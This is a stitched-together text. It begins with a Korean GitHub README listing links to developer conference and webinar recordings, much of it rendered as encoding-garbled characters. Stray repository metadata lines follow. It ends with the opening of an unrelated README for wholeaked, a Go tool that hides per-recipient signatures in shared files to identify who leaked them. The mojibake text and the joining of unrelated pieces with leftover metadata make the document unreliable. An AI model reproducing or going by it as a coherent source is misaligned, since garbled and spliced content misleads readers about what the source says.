์›จ๋น„๋‚˜](https://youtu.be/KM1-kqSAw3c) - 2022.12.15 ## ๋ชจ๋นŒ๋ฆฌํ‹ฐ - ํ˜„๋Œ€์ž๋™์ฐจ - [HMG Developer Conference](https://www.hmgdevcon.com) - [์ œ1ํšŒ](https://www.youtube.com/playlist?list=PLypFzBtJUO_jOcX48cwJ21pFpzkkWLqWm) | [์ œ2ํšŒ](https://www.youtube.com/playlist?list=PLypFzBtJUO_gRRauzZOhH9TexiYmrYcyX) | [์ œ3ํšŒ](https://www.youtube.com/playlist?list=PLypFzBtJUO_gDlP0xkac4kXAaGcr_w31w) - 2023.11.13 - Softeer Tech Meet-up - [1st, 2nd](https://www.youtube.com/playlist?list=PLypFzBtJUO_gRY3U3XPjutaUDskzKP_tv) - 2023.09.14 - ์นด์นด์˜ค๋ชจ๋นŒ๋ฆฌํ‹ฐ - [MEMO](https://nemo.kakaomobility.com) - [2022](https://www.youtube.com/playlist?list=PLAi6ak51pSz2O8W4VPsKsUQ_X4oVcvfz6) | [2023](https://www.youtube.com/playlist?list=PLAi6ak51pSz0F7I22FkxYZfs856ZNYX97) - 2023.09.08 ## ๊ฒŒ์ž„ - ๋„ฅ์Šจ - [NDC](https://ndc.nexon.com) - [2021](http://ndcreplay.nexon.com/#c=NDC2021) | [22](https://ndc.nexon.com/session/sessionDay1) - 2022.06.08~10 - ์œ ๋‹ˆํ‹ฐ ์ฝ”๋ฆฌ์•„ - [์œ ๋‚˜์ดํŠธ ์„œ์šธ 2020](https://www.youtube.com/playlist?list=PL412Ym60h6ush2X5_8B8LbKXaBSjIFopd) | [UNITE 2022](https://www.youtube.com/playlist?list=PL412Ym60h6uudM6ziOyy2Eb8KsARTZsmi) | [UNITE 2023](https://www.youtube.com/playlist?list=PL412Ym60h6utvkxkA2zlBIvDhtNLLUPKT) - 2023.11.30 - [Unity Wave 2022](https://www.youtube.com/playlist?list=PL412Ym60h6uskscz6NE7X7KjihUic7YtU) - 2022.05.09~13 ## ๋ณด์•ˆ - Samsung Research - [SSTF(Samsung Security Tech Forum)](https://research.samsung.com/sstf) - [2021](https://www.youtube.com/playlist?list=PLhpbZcOKxtO1eA3dVfatqd5bpwbGd0oXP) | [2022](https://www.youtube.com/playlist?list=PLhpbZcOKxtO0MkZ88h_y0Xs8VH2rFigWc) | [2023](https://www.youtube.com/playlist?list=PL7PfK8Mp1rLHT5-tkJtHrz0jCCQ_300tb) - 2023.08.22 - ์†Œํ”„ํŠธ์›จ์–ด ๊ฐœ๋ฐœ๋ณด์•ˆ ์ปจํผ๋Ÿฐ์Šค - [์ œ11ํšŒ(2021), ์ œ12ํšŒ(2022), ์ œ13ํšŒ(2023) ์†Œํ”„ํŠธ์›จ์–ด ๊ฐœ๋ฐœ๋ณด์•ˆ 
์ปจํผ๋Ÿฐ์Šค](https://www.youtube.com/playlist?list=PLlFyHGHMXJU_p_288gCexBvV6tYtMtDBz) - 2023.11.14 - ์‹œํ๋ ˆ์ด์–ด - ๊ฐœ๋ฐœ์ž ์ปจํผ๋Ÿฐ์Šค STICK [2022](https://www.youtube.com/playlist?list=PL2JstscjHCud5oW7F3PZ5UJOrqFdbBhD1) | [2023](https://www.youtube.com/playlist?list=PL2JstscjHCueZR9css8YRXB81kKIkx8Iq) - 2023.11.01 - ๋ฐ์ผ๋ฆฌ์‹œํ - [PASCON](https://www.dailysecu.com/form/register.html?form_id=1639447124) - [2020](https://www.youtube.com/playlist?list=PLVzhBRBZvsfMQKMRlU4eotmXgPPxPhxoJ) | [2021](https://www.youtube.com/hashtag/pascon2021) | [2022](https://www.youtube.com/playlist?list=PLVzhBRBZvsfNceqznSO5GlkYrUkOrIrxX) | [2023](https://www.youtube.com/playlist?list=PLVzhBRBZvsfPcPeMevubEODj30J_STwHJ) - 2023.09.05 - G-PRIVACY [2023](https://www.youtube.com/playlist?list=PLVzhBRBZvsfOtpSy2LxIaZM7q8-o4ePMm) | [2024](https://www.youtube.com/playlist?list=PLVzhBRBZvsfP17wTtDtyigcT8imLIk9hU) - 2024.03.12 - ์•ˆ๋žฉ(AhnLab) - ISF - [2020](https://youtu.be/lbu_fD36ex4?list=PLcETc5mLmNrXk7QFkcY5y-9OL_DoCA7Kt) | [2021](https://youtu.be/rHyFZn5fMrQ?list=PLcETc5mLmNrXk7QFkcY5y-9OL_DoCA7Kt) | [2022](https://youtu.be/F3lt03ZBADg?list=PLcETc5mLmNrXk7QFkcY5y-9OL_DoCA7Kt) | [2023](https://www.youtube.com/playlist?list=PLcETc5mLmNrUOXF2H9BrTewvI5polNOl6) - 2023.09.07 - ์ฝ”๋“œ์—”์ง„ - CodeEngn Conference - [2021](https://www.youtube.com/playlist?list=PLscYqoBID5Z4G_YQKUGP_ZioNF7BNCKdX) | [2022](https://www.youtube.com/playlist?list=PLscYqoBID5Z5XYI_eC_FoNOxTegKuKoR2) | [2023](https://www.youtube.com/playlist?list=PLscYqoBID5Z4ZmgDyuAApOyDKkA0u8Cqv) - 2023.07.03 ## ๋ชจ๋ฐ”์ผ - ๊ตฌ๊ธ€ ๊ฐœ๋ฐœ์ž ๊ทธ๋ฃน(GDG) - I/O Extended Korea Android [2021](https://youtu.be/NIGV-NUf1pQ) | [2022](https://youtu.be/1TsQ0buZUas) - 2022.06.11 - ๋“œ๋กœ์ด๋“œ๋‚˜์ด์ธ  - [2020](https://www.youtube.com/playlist?list=PLu8dnNjU2Fmtg2gML0DVXakykl3NaWLZy) | [2021](https://www.youtube.com/playlist?list=PLu8dnNjU2FmsROfv5pNAvhRiOFVN_EmnV) | [2023](https://www.youtube.com/playlist?list=PLu8dnNjU2Fmv55B8y6Mw78pZFflIoxDo8) - 2023.09.12 - Async Swift Korea - [SyncSwift 2022](https://www.youtube.com/playlist?list=PLu5z3LShQlQXuZKlehlTfGZFc753dkgOs) - 2022.11.12 - AsyncSwift Seminar [001](https://www.youtube.com/playlist?list=PLu5z3LShQlQURqEqfYc-IfedIq8afW-mc), [002](https://youtu.be/46l90qYNHCc?t=1215) - 2022.09.22 - Seoul iOS Meetup - 2023 - [April](https://www.youtube.com/playlist?list=PLAFxr8OPgeVFdySPXGq8Nv37HfFcYM0ro), [May](https://www.youtube.com/playlist?list=PLAFxr8OPgeVF18jds65HTjzTQEbuVeq1A), [June](https://www.youtube.com/playlist?list=PLAFxr8OPgeVFxT5Vp_OVKBr-bgeyyVN-V), [July](https://www.youtube.com/playlist?list=PLAFxr8OPgeVEIC_uoQc07lGbRJ-kI5DNO), [August](https://youtu.be/22GjhyFqEcE?list=PLAFxr8OPgeVHiv1RO78GHNxvoDTjRRsNt&t=2), [October](https://youtu.be/1DkOCVeX26s?list=PLAFxr8OPgeVHF5i7kLXuNvJsadfPmwYU6), [December](https://youtu.be/0Q0leVjH2gM?list=PLAFxr8OPgeVGrG3efpsyWtWbnYcWJQdf1) - 2023.12.14 - 2024 - [January](https://youtu.be/FmYf5Yz77wg?list=PLAFxr8OPgeVF_SAt2o7lOe2UVJXb7yzg-) - 2024.01.18 - adiOS Korea - adiOS 2021 - [Oct](https://www.youtube.com/playlist?list=PLUsr11byBStFxL1J6wvflz_xyoiD2OeW9), [Dec](https://www.youtube.com/watch?v=hOEsIUa7-1M) | 2022 - [Blossom](https://www.youtube.com/playlist?list=PLUsr11byBStFUV0VHQEHBZA2XS0K-I9F7), [Intro](https://www.youtube.com/playlist?list=PLUsr11byBStEAiW2zHCqpGXvT6U5iMjfH), [ASAP๐Ÿฅ„](https://www.youtube.com/playlist?list=PLUsr11byBStGovDXPQ4EcTi0Q4dst1Hei), [Something](https://www.youtube.com/playlist?list=PLUsr11byBStFIg-hhapmB6nuj0dgJQjJ6) - 2022.12.18 - 
๊ธฐํƒ€ - IMQA > [IMDEV 2023](https://www.youtube.com/playlist?list=PLmTSJ8F4eG5EUbh2Y4zcaiXZoNgLQoRyK) - 2023.02.20~21 ## ํ”„๋ก ํŠธ์—”๋“œ & JS - ํ”„๋ก ํŠธ์—”๋“œ ๊ฐœ๋ฐœ์ž ์ปจํผ๋Ÿฐ์Šค - FECONF 2020 - [A Track](https://www.youtube.com/playlist?list=PLZl3coZhX98q_yvsIzo0exOGSdmWeT_o6), [B Track](https://www.youtube.com/playlist?list=PLZl3coZhX98rqCYUOqO0Wbkas1hM1hlS2) | 2021 - [A Track](https://www.youtube.com/playlist?list=PLZl3coZhX98p6gwel6QW86QUwuAmTEZBo), [B Track](https://www.youtube.com/playlist?list=PLZl3coZhX98qv9ixNHWYkUOnwnW8xXvqD) | 2022 - [A Track](https://www.youtube.com/playlist?list=PLZl3coZhX98pajnfobtWKCU9XH3zNNT-v), [B Track](https://www.youtube.com/playlist?list=PLZl3coZhX98pl7L0FZW2XMg7fE3nZAJk3) | 2023 - [A Track](https://www.youtube.com/playlist?list=PLZl3coZhX98p5lWeGKAdUgA93bioesqjc), [B Track](https://www.youtube.com/playlist?list=PLZl3coZhX98rM8yercTFaikRkBJf8rfKJ) - 2023.10.21 - ์ž๋ฐ”์Šคํฌ๋ฆฝํŠธ ์ปจํผ๋Ÿฐ์Šค - [JSConf Korea](https://jsconf.kr) - [2020 Home Edition](https://www.youtube.com/playlist?list=PL37ZVnwpeshHlUonQ2pnYFd8SAiicjmlm) | [2022](https://www.youtube.com/playlist?list=PL37ZVnwpeshH7y4tbeYslJ5MN1JvyYEks) - 2022.09.16~17 - ๊ธฐํƒ€ - Nest.js Korea - [NestJS ๋ฐ‹์—…](https://www.youtube.com/@nestjskorea/videos) - 2023.06.15 ## ํ”„๋กœ๊ทธ๋ž˜๋ฐ ์–ธ์–ด - ํŒŒ์ด์ฝ˜ ํ•œ๊ตญ - [PyCon.KR](https://pycon.kr) - [2020](https://www.youtube.com/playlist?list=PLZPhyNeJvHRk9wIL9rZekFLIfT3aVcHT7) | [2021](https://www.youtube.com/c/PyConKRtube/videos?view=0&sort=dd&shelf_id=0) | [2022](https://www.youtube.com/playlist?list=PLZPhyNeJvHRnlqQwMj-WNlrsac7yTiVhk) | [2023](https://www.youtube.com/playlist?list=PLZPhyNeJvHRllQiXsJAryqWmqWrwFxY8I) - 2023.08.12~13 - ํ•œ๊ตญ ์Šคํ”„๋ง ์‚ฌ์šฉ์ž ๋ชจ์ž„ - [KSUG](https://www.ksug.org) - [2021 Webinar](https://www.youtube.com/playlist?list=PLn0dGEB80JNQLm7-af9X6Yqx1oBK8YXSm) - 2021.04.30 - SpringCamp - [2019](https://www.youtube.com/playlist?list=PLdHtZnJh1KdaM0AfxPA7qGK1UuvhpvffL) | [2023](https://www.youtube.com/playlist?list=PLdHtZnJh1KdbR9xXyiVJ-BClLTXCw66y3) - 2023.04.22 - Golang Korea - GopherCon Korea - [2021](https://www.youtube.com/playlist?list=PL2ntRZ1ySWBfulCVQD6EaU8c-GM56aUU7) | [2022](https://www.youtube.com/playlist?list=PL2ntRZ1ySWBfiSJSt-zPRbVSMDfK0EwQC) | 2023 [Day1](https://youtu.be/WZthMW0BaNA?t=1322) [Day2](https://youtu.be/8AUVKh0qJgU?t=1333) - 2023.08.05~06 - [2020.05 ์˜จ๋ผ์ธ ๋ฐ‹์—…](https://www.youtube.com/playlist?list=PLxEDm5GRSh4OJPiKKv5PVKiDi6f80kyTS) | [2022.03 Go 1.18 ๋ฆด๋ฆฌ์ฆˆํŒŒํ‹ฐ](https://www.youtube.com/playlist?list=PLxEDm5GRSh4P6aihX1DrNsV57r7bi0rZT) - 2022.03.31 - ๋‹ท๋„ท ๊ฐœ๋ฐœ์ž ์ปค๋ฎค๋‹ˆํ‹ฐ [๋‹ท๋„ท๋ฐ๋ธŒ](https://www.dotnetconf.kr) - .NET Conf - [2021](https://www.youtube.com/playlist?list=PLFVJi7gR5oaOtgZYZ4d77HcyjhcQ9iW4z) | [2022 x Seoul](https://www.youtube.com/playlist?list=PLFVJi7gR5oaPwyL4bR0vL4pwVDf321443) | [2023 x Seoul](https://www.youtube.com/playlist?list=PLFVJi7gR5oaOaTF5bMD0m_7ms9rfmndX4) | [2024 x Seoul](https://www.youtube.com/playlist?list=PLFVJi7gR5oaNapfx69uag1Z6KePIbHGfA) - 2024.02.21 - .NET Conf Mini - [21.04](https://www.youtube.com/playlist?list=PLFVJi7gR5oaMfdN1Q7rqFKa7ZWeW9O6k6), [21.08](https://www.youtube.com/playlist?list=PLFVJi7gR5oaOZVfHgT3IPQvk5uW2nzK3e) | [22.05](https://youtu.be/W95lo-337Q8), [22.09](https://youtu.be/Z6Z3qgHYaOg) | [L!VE 2023 Fall](https://www.youtube.com/playlist?list=PLFVJi7gR5oaPdlmQk0TjxxLyD7ND9Ws-g) - 2023.10.19 - Flutter Korea - [Flutter Festival Korea](https://www.youtube.com/playlist?list=PL6RQwUkx6VTSK_jxZUIh7usPE8JLpnaoS) - 
2022.03.05 - [Flutter Engage](https://www.youtube.com/playlist?list=PL6RQwUkx6VTRUeQzsqVg-DgH38ME96w4F) | [FlutterDay 2020](https://www.youtube.com/playlist?list=PL6RQwUkx6VTSmCR632XO0_cGVN7JjeMHg) | [Flutter I/O Extended Korea](https://youtu.be/2zNYDTOLkzU?list=PL6RQwUkx6VTT49sWkCaWqb__6fEcc7AkH&t=1788) - 2022.06.26 - [Flutter Forward Extended Korea](https://www.youtube.com/playlist?list=PL6RQwUkx6VTRLPlCimOmv8UeLKC9FAlzf) - 2023.04.01 - ๊ทธ๋ฆฐ๋žฉ์Šค ์†กํŒŒ ํด๋กœ์ € - [Dev Dive 2022 - ํ•จ์ˆ˜ํ˜• ๊ฐœ๋ฐœ์ž๋กœ ์„ฑ์žฅํ•˜๊ธฐ](https://www.youtube.com/playlist?list=PLOdBZFDkhfV00trSo0SEdHMTaLruDNTzV) - 2022.11.08~09 - Clojure [2022 meetup+](https://youtu.be/BdSoNmWksuk) - 2022.06.10 - ์ฝ”๋“œ์Šค์ฟผ๋“œ - [๋ ˆ์ธ ์Šค์œ„ํ”„ํŠธ](https://letswift.kr) - [2020 ํ…Œํฌํ† ํฌ Day](https://www.youtube.com/playlist?list=PLAHa1zfLtLiPnvGyT0Qzt58nNfMAL8JER) | [2022](https://www.youtube.com/playlist?list=PLAHa1zfLtLiPunFALpY6c_ml_Kmpgya0J) | [2023](https://www.youtube.com/playlist?list=PLAHa1zfLtLiPY9gDxRwhNDbYZvjFKiurH) - 2023.10.13 - [ํ•œ๊ตญ R ์ปจํผ๋Ÿฐ์Šค](https://use-r.kr) - [ํ•œ๊ตญ R ์ปจํผ๋Ÿฐ์Šค 2021](https://www.youtube.com/playlist?list=PLhTWL0svc2zy4FB-Dy1yrAaYLmrUjXrPg) - 2021.11.19 - Seoul R Meetup - [2021](https://www.youtube.com/playlist?list=PLhTWL0svc2zyVdv-sgLQFs9SHtk31JMEJ) | [2023](https://www.youtube.com/playlist?list=PLhTWL0svc2zzMcB6UAOY2zklOApy33T0H) - 2023.05.11 ## ์˜คํ”ˆ์†Œ์Šค - ์˜คํ”ˆ์†Œ์Šค ์†Œํ”„ํŠธ์›จ์–ด ํ†ตํ•ฉ์ง€์›์„ผํ„ฐ, ์˜คํ”ˆ์—…(Open UP) - ์˜คํ”ˆ ํ…Œํฌ๋„ท ์„œ๋ฐ‹(Open Technet Summit) - [2020 | 2021 | 2022 | 2023](https://www.youtube.com/playlist?list=PL8MaVgZDhGk_E0jjMCeTyW3qz5uh86YtJ) - 2023.09.14 - [2020,2021,2022,2023 ๊ณต๊ฐœ์†Œํ”„ํŠธ์›จ์–ด ํŽ˜์Šคํ‹ฐ๋ฒŒ](https://www.youtube.com/playlist?list=PL8MaVgZDhGk_6lUMRnoGQO8Xy4d3RXTDa) - 2023.09.14 - [์ œ9ํšŒ ํ•œ๊ตญ ์ปค๋ฎค๋‹ˆํ‹ฐ ๋ฐ์ด - KCD 2020](https://www.youtube.com/watch?v=Scj3YCVPsAU&list=PL8MaVgZDhGk9CYn_IkRkgnN1R7kpE582A&index=7) - 2020.11.07 - ํ•œ๊ตญ์ „์žํ†ต์‹ ์—ฐ๊ตฌ์› - [EOST(ETRI ์˜คํ”ˆ์†Œ์Šค ํ…Œํฌ๋ฐ์ด)](https://eostday.kr) - [2020 | 2021 | 2022 | 2023](https://www.youtube.com/playlist?list=PLGvb-9I0h7UitqxaXbs0SFvooVGkvEvTr) - 2023.10.11 ## ๊ต์œก - ๋„ค์ด๋ฒ„ ์ปค๋„ฅํŠธ์žฌ๋‹จ - [SEF](https://sef.connect.or.kr) - [2020, 2021, 2022, 2023](https://www.youtube.com/playlist?list=PLzUx59pIXJDzG0yMuVcvNFM0ErXk-W5Eg) - 2023.09.06~08 - ์ธํ”„๋Ÿฐ - [INFCON](https://infcon.day) - [2022](https://www.youtube.com/playlist?list=PLpkj8RKr48wZMPKR292FOoahqxVDi6d6R) | [2023](https://www.youtube.com/playlist?list=PLpkj8RKr48waFtrqvJjbNrpGCvdxyX8Nx) - 2023.08.15 - [ํ‡ด๊ทผ๊ธธ ๋ฐ‹์—…](https://www.youtube.com/playlist?list=PLpkj8RKr48wbl8rsApCB9nWDaSK23xRpM) - 2024.02.28 - ํ”„๋กœ๊ทธ๋ž˜๋จธ์Šค - [ํ”„๋กœ๊ทธ๋ž˜๋จธ์Šค ์˜จ๋ผ์ธ ์ปจํผ๋Ÿฐ์Šค 1st](https://www.youtube.com/playlist?list=PLz4XWo74AOafAHPTyd4ikJwRkXmptWXwI) - 2022.11.26 - [๋ฐ์ดํ„ฐ ์—”์ง€๋‹ˆ์–ด๋ง ์ปจํผ๋Ÿฐ์Šค](https://www.youtube.com/playlist?list=PLz4XWo74AOaeXlr6zxjA_24vr8qoSzxHE) - 2023.04.01 - [2022 ํ”„๋กœ๊ทธ๋ž˜๋จธ์Šค SILLY TALK](https://www.youtube.com/playlist?list=PLz4XWo74AOadffWyvALUKsNSW0pFBD1Dl) - 2022.10.15 - ์ด๋…ธ๋ฒ ์ด์…˜ ์•„์นด๋ฐ๋ฏธ - [INNO-CON](https://innocon.co.kr) - [แ„‹แ…ตแ„‚แ…ฉแ„‡แ…ฆแ„‹แ…ตแ„‰แ…งแ†ซแ„‹แ…กแ„แ…กแ„ƒแ…ฆแ„†แ…ต แ„‰แ…ฅแ†ผแ„€แ…ช แ„€แ…ฉแ†ผแ„‹แ…ฒ แ„แ…ฅแ†ซแ„‘แ…ฅแ„…แ…ฅแ†ซแ„‰แ…ณ 2020 ~ 2023](https://www.youtube.com/playlist?list=PLdaJq4f37m1p-0EEXIO7JDb3xXhlluWC4) - 2023.10.05 - [ํ”ผ๋กœ๊ทธ๋ž˜๋ฐ](https://pirogramming.com) - [2022 ๊ฒจ์šธ ํ”ผ๋กœ์ปจํผ๋Ÿฐ์Šค](https://www.youtube.com/playlist?list=PLslwDteUjPslzKLhryKb5IIaRg4fCz6Fw) - 2022.02.17~18 ## 
์ปค๋ฎค๋‹ˆํ‹ฐ - AWS ํ•œ๊ตญ ์‚ฌ์šฉ์ž ๋ชจ์ž„ [AWSKRUG](https://awskrug.github.io) - AWS Community Day [Online 2020](https://www.youtube.com/playlist?list=PLX2fs3661XpMjuok2MTitzTxSaLXfxsBu) | [2020](https://www.youtube.com/playlist?list=PLX2fs3661XpPDIQb9pyDvflxz6yDdLnro) | [2021](https://www.youtube.com/playlist?list=PLX2fs3661XpOHFIaKMfEKP1FAvYf0rvEo) | [2022 Seoul - Home Coming Day](https://www.youtube.com/playlist?list=PLX2fs3661XpN1mBctkVosU5jxkusdBRxC) | [2023 Seoul](https://www.youtube.com/playlist?list=PLX2fs3661XpMrFZaU4i2y4RqylcuvfVLA) - 2023.10.28 - โœจ AWSKRUG Meetup [์„ฑ์ˆ˜](https://www.youtube.com/playlist?list=PLX2fs3661XpMOLPMLYAyMHlCYbHqwg6Fy) | [๊ตฌ๋””](https://www.youtube.com/playlist?list=PLX2fs3661XpOyBd4AQ1o8i9pL4gP7jZa0) | [Container](https://www.youtube.com/playlist?list=PLX2fs3661XpN2e_Gxt07jmAyp11zNGmwM) | [DataScience](https://www.youtube.com/playlist?list=PLX2fs3661XpMO995pE2jMp92jM4xkJz7w) | [Database](https://www.youtube.com/playlist?list=PLX2fs3661XpOJU6zVCP6oISzz4Pol2LJs) | [Deepracer](https://www.youtube.com/playlist?list=PLX2fs3661XpNNr_PFfV7Y0BngN_OxJfrE) | [Security](https://www.youtube.com/playlist?list=PLX2fs3661XpMRNU4vOSq-LJeDJ26LKxEx) | [Frontend](https://www.youtube.com/playlist?list=PLX2fs3661XpNfRSZ9TD_xyQdegvtNDsdw) | [GameTech](https://www.youtube.com/playlist?list=PLX2fs3661XpOKTk_J-UHHAcCn64O96ql9) | [Architecture](https://www.youtube.com/playlist?list=PLX2fs3661XpPrBgaLhrBk-OSV8EtTsAc-) - 2024.05.29 - ๊ตฌ๊ธ€ ๊ฐœ๋ฐœ์ž ๊ทธ๋ฃน(GDG KOREA) - I/O Extended - [2021 with doubleS](https://www.youtube.com/playlist?list=PLF_OUznA3RTTadLaKE9gVJY5MR6ncdmiX) | 2022 Seoul - [Part1](https://youtu.be/GfbJp3CHWBk?t=1696), [Part2](https://youtu.be/bU7F_Ca6xQ8?t=395) - 2022.06.20 - [Kotlin 'Summer' Night 2022 Seoul](https://youtu.be/3sX3Oki9PD8?t=295) - 2022.09.06 - [Devfest](https://www.facebook.com/devfest.seoul.2019) - [Korea 2020](https://www.youtube.com/playlist?list=PLF_OUznA3RTSoRHlcIRg4KZYSFJ6rfGfm) | Seoul 2021 [ํ˜ธ๋นต ํŠธ๋ž™](https://youtu.be/t_BVZkPc650?t=609), [๋ถ•์–ด๋นต ํŠธ๋ž™](https://youtu.be/HGy-PvnJC3g?t=609) - 2021.11.03 - GDG Daegu - [Code Action 1st](https://youtu.be/GngEX-zVo6Y?t=292) - 2022.08.27 - GDG SongDo - [Flutter](https://www.youtube.com/playlist?list=PLSCuU2a9seuO4xpzlC7dRjrVMhV6idD42) | [Machine Learning](https://www.youtube.com/playlist?list=PLSCuU2a9seuMJ6Ee-KTBDgokc9nfjwahJ) Meetup Songdo 23 - 2023.10.20 - ์˜คํ‚ค์ฝ”๋ฆฌ์•„ [OKKY](https://okky.kr) - [OKKYCON: 2021](https://www.youtube.com/playlist?list=PLhSAACiXcoKL4Jupof50JNmQi7_VI1-ne) - 2021.03.06 - [OKKY ์„ธ๋ฏธ๋‚˜](https://www.youtube.com/playlist?list=PLhSAACiXcoKIxl_lzk0u22hiXUY0f5yut) - 2023.12.19 - ๊ธฐํƒ€ - AWS Cloud Clubs - [EWHA ๋ฉค๋ฒ„ ํ…Œํฌํ†ก์„ธ์…˜](https://www.youtube.com/@AWSCloudClub_KR/videos) - 2024.02.13 ## ๊ธฐํƒ€ - 11๋ฒˆ๊ฐ€ - [TECH TALK](https://techtalk.11stcorp.com) - 2022 [DAY1](https://www.youtube.com/playlist?list=PL5ew9vtXjSu9EzCttLVM0uTTC26oBBRrR), [DAY2](https://www.youtube.com/playlist?list=PL5ew9vtXjSu8hZ3_F9CU2A7HlkGRyUMUQ) | 2023 [DAY1](https://www.youtube.com/playlist?list=PL5ew9vtXjSu9SEt-ttOVSDfucjmDUW-cy), [DAY2](https://www.youtube.com/playlist?list=PL5ew9vtXjSu_Ex8xvgqxxMr-NuUXkKEIc) - 2023.12.12~13 - ํ‹ฐ๋งฅ์Šค - [TmaxDay 2020](https://www.youtube.com/playlist?list=PLAmBb6Ov-e5sT7Lv6XUedwc-seLwy5lvJ) | [SuperWeek 2022](https://www.youtube.com/playlist?list=PLAmBb6Ov-e5sAPz-4sUEOoPQMc9CyUJBQ) - 2022.09.06~07 - ํ•œ๊ตญ์ „์žํ†ต์‹ ์—ฐ๊ตฌ์› - [ETRI CONFERENCE 2022](https://youtu.be/4z1zU2CyX6M?list=PLGvb-9I0h7UiT5plM2JTLTWDNlcby6OQg) | 2023 
[Day 1](https://youtu.be/LldtbXkn1go), [Day 2](https://youtu.be/LA_VEuJPEdg) - 2023.11.07~08
- ET News webinar channel [allshow TV](https://www.allshowtv.com)
  - No-Code/Low-Code (NCLC) Automation Impact - [2023](https://www.youtube.com/playlist?list=PLumdCu9Q56KqHjfLS9iYcp2rHFCPpSutT) | [2024](https://www.youtube.com/playlist?list=PLumdCu9Q56KpO8eX5H022LmNmXoiKzYm5) - 2024.01.30
  - [Digital Transformation (DX) & Enterprise Tech Grand Summit 2022](https://www.youtube.com/playlist?list=PLumdCu9Q56KpbQr_bUOe9jdHSERpA240H) - 2022.03.25
  - [Smart Manufacturing Innovation & Digital Twin Grand Summit 2022](https://www.youtube.com/playlist?list=PLumdCu9Q56Komt4Au9L6Hy3fA4K4Enlze) - 2022.03.18
  - [2022 Cloud Native & Digital Experience Optimization Grand Webinar](https://www.youtube.com/playlist?list=PLumdCu9Q56KqtjXNhMwAIlKlEcMwiO0FX) - 2022.01.21
  - [2022 Smart Digital Workplace Innovation Conference](https://www.youtube.com/playlist?list=PLumdCu9Q56Koxg5-QgDjFiTJXl0YCWS-G) - 2022.04.28
  - [AI Cyber Security Summit 2022](https://www.youtube.com/playlist?list=PLumdCu9Q56KoTyvg-1UEVQo-XXHfEnHr3) - 2022.06.29
  - SMART WORK KOREA SUMMIT - [2021](https://www.youtube.com/playlist?list=PLumdCu9Q56KotSnS635wsz-U1dat3SkDa) | [2022](https://www.youtube.com/playlist?list=PLumdCu9Q56KpC23VodBNoqdoqGXaW5tD6) - 2022.08.25
  - Korea RPA Grand Summit - [2021](https://www.youtube.com/playlist?list=PLumdCu9Q56KrUlNz1Ei-UhrkU-EyMklZX) | [2022](https://www.youtube.com/playlist?list=PLumdCu9Q56KqSqutlFHBGFfn4VlMqwAyC) - 2022.04.29
- Digital Today [webinars](http://www.digitaltoday.co.kr/bbs/list.html?table=bbs_27)
  - [Digital Today TV Live](https://www.youtube.com/playlist?list=PL28NueUz2IV-5FCDu8X0eHRwPOXtxXPXA) - 2022.05.26
- IT Chosun YouTube channel [TechCafe](https://www.youtube.com/c/TechCafe2013)
  - Cloud online conference [2022: The Data-Driven Era](https://youtu.be/LC6rMLgH08g?list=PL18jcdQAgye-x3e4TO85gowHqWCUpH6Wo) | [2023: Digital Transformation and Hyperscale AI](https://youtu.be/fmUoLHOJ7tQ?list=PL18jcdQAgye-x3e4TO85gowHqWCUpH6Wo) - 2023.03.29
  - [AI Outlook 2022 Webinar](https://www.youtube.com/playlist?list=PL18jcdQAgye-x3e4TO85gowHqWCUpH6Wo) | [AI&COULD 2024](https://www.youtube.com/playlist?list=PL18jcdQAgye9fWSDyHdvvGdty3OMB6afU) - 2024.03.27
- Startup Alliance Korea
  - Koreans in Silicon Valley - [2020](https://www.youtube.com/playlist?list=PLy5RUqlc3TGF_0HysuC1lWW0h0x9-jUqi) | [2021](https://www.youtube.com/playlist?list=PLy5RUqlc3TGFPLAlHx3sXz26bMoUM3LL-) | [2022](https://www.youtube.com/playlist?list=PLy5RUqlc3TGH9eHISCJ-HCOI1PNWw5fPT) | [2023](https://www.youtube.com/playlist?list=PLy5RUqlc3TGGFE41jnRQc5mB56qKGgUPy) - 2023.10.11
- Agile Korea - [AKC](https://www.facebook.com/AgileKoreaConference)
  - [2020](https://www.youtube.com/playlist?list=PLqLyqFSqvAE5ZmYBRsAaHIwfCKRBRaYqy) | [2021](https://www.youtube.com/playlist?list=PLqLyqFSqvAE4nquOU5p5-eeoxfkdZK5Th) - 2021.12.09
- Hanbit Media - [DevGround 2019](https://www.youtube.com/playlist?list=PLVsNizTWUw7HxXDshrgEr5eeHf2cqjtqA) | [DevGround Junior 2019](https://www.youtube.com/playlist?list=PLVsNizTWUw7EOvb0_pJ94NZRnScD0jpzI) - 2019.12.13

## Additional Resources
- [Free programming e-books](https://github.com/EbookFoundation/free-programming-books/blob/main/books/free-programming-books-ko.md)
- [Data structures and algorithms by programming language](https://github.com/TheAlgorithms)

## References
- https://github.com/brave-people/Dev-Event
๐Ÿ€ ์ตœ๊ทผ ๊ตญ๋‚ด IT ์„ธ๋ฏธ๋‚˜ ๋ฐ ๊ฐœ๋ฐœ์ž๐Ÿ’ป ์ปจํผ๋Ÿฐ์Šค ์˜์ƒ์˜ ๋‹ค์‹œ ๋ณด๊ธฐ๐Ÿ‘€ ๋งํฌ๋ฅผ ํ•œ๊ณณ์— ์ •๋ฆฌํ–ˆ์Šต๋‹ˆ๋‹ค!
developer,conference,readme,it,korean,docs,ai,cloud,data,meetup
0
5
5
454
0
1
1
utkusen/wholeaked
# Introduction

```
    ,_     ,' '\,_     Utku Sen's
    |_,-'_)            wholeaked
    /##c '\  (
   ' |'  -{.  )        "When you have eliminated the impossible,
     /\__-' \[]        whatever remains, however improbable,
    /'-_'\             must be the truth" - Sherlock Holmes
    '     \
```

wholeaked is a file-sharing tool that allows you to find the responsible person in case of a leakage. It's written in Go.

## How?

wholeaked gets the file that will be shared and a list of recipients. It creates a unique signature for each recipient and adds it to the file secretly. It can then automatically send the files to the corresponding recipients by using Sendgrid, AWS SES or SMTP integrations. Instead of sending them by e-mail, you can also share them manually.

wholeaked works with every file type. However, it has additional features for common file types such as PDF, DOCX, MOV etc.

### Sharing Process

*(Diagram: `utkusen/wholeaked` takes `Top Secret.pdf` plus a recipient list (`a@gov`, `b@gov`, `c@gov`) and produces one copy per recipient, each carrying its own hidden signature: signature1, signature2, signature3.)*

### Validation Part

To find who leaked the document, you just need to provide the leaked file to wholeaked, and it will reveal the responsible person by comparing the signatures in the database.

*(Diagram: the leaked `Top Secret.pdf` is matched against the signature database, revealing that the document was leaked by `b@gov`.)*
